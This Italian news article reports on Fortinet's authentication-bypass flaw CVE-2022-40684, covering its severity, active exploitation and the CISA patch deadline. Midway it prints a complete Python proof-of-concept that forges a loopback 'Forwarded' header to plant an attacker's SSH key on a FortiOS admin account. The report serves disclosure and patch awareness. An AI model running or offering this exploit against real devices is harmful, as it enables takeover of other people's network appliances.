Redazione RHC 14 Ottobre 2022 15:14
Fortinet ha recentemente corretto una vulnerabilità critica di bypass dell’autenticazione nei progetti FortiOS, FortiProxy e FortiSwitchManager (CVE-2022-40684). Questa vulnerabilità offre a un utente malintenzionato la possibilità di accedere come amministratore al sistema interessato.
È stato reso disponibile un codice exploit proof-of-concept (PoC), rendendo di fatto ancora più essenziale l’installazione delle patch prodotte dal vendor, qualora non siano impostati gli aggiornamenti automatizzati.
“FortiOS espone il portale web di gestione che consente a un utente di configurare il sistema”
ha affermato il ricercatore di sicurezza dell’azienda Horizon3.ai James Horseman .
“Inoltre, un utente può SSH nel sistema che espone un’interfaccia CLI bloccata.”
#!/usr/bin/python3 import argparse import json import requests import urllib3 requests.packages.urllib3.disable_warnings() urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) HEADERS = { 'User-Agent': 'Report Runner', 'Forwarded': 'for="[127.0.0.1]:8888";by="[127.0.0.1]:8888"' } def format_key(key_file): with open(key_file) as f: k = f.read().strip() return(k) def add_key(target, username, key_file): key = format_key(key_file) j = { "ssh-public-key1": '\"' + key + '\"' } url = f'https://{target}/api/v2/cmdb/system/admin/{username}' r = requests.put(url, headers=HEADERS, json=j, verify=False) if 'SSH key is good' not in r.text: print(f'[-] {target} is not vulnerable!') else: print(f'[+] SSH key for {username} added successfully!') if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument('-t', '--target', help='The IP address of the target', required=True) parser.add_argument('-u', '--username', help='The user to add an SSH key file for', required=True) parser.add_argument('-k', '--key-file', help='The SSH key file', required=True) args = parser.parse_args() add_key(args.target, args.username, args.key_file)
Il problema, rilevato come CVE-2022-40684 (punteggio CVSS: 9,6), riguarda una vulnerabilità di bypass dell’autenticazione che potrebbe consentire a un utente malintenzionato remoto di eseguire operazioni dannose sull’interfaccia amministrativa tramite richieste HTTP(S) appositamente predisposte.
Sfruttare con successo la carenza, equivale a garantire l’accesso completo “per fare qualsiasi cosa” sul sistema interessato, inclusa la modifica delle configurazioni di rete, l’aggiunta di utenti malintenzionati e l’intercettazione del traffico di rete.
Il rilascio del PoC arriva quando Fortinet ha avvertito di essere a conoscenza di uno sfruttamento attivo della falla di sicurezza, spingendo la Cybersecurity and Infrastructure Security Agency (CISA) degli Stati Uniti a emettere un avviso che esorta le agenzie federali a correggere il problema entro novembre 1, 2022.
La società di intelligence sulle minacce GreyNoise ha rilevato 12 indirizzi IP univoci che utilizzavano la CVE-2022-40684 a partire dal 13 ottobre 2022, la maggior parte dei quali si trova in Germania, seguita da Stati Uniti, Brasile, Cina e Francia.
La redazione di Red Hot Cyber è composta da un insieme di persone fisiche e fonti anonime che collaborano attivamente fornendo informazioni in anteprima e news sulla sicurezza informatica e sull’informatica in generale.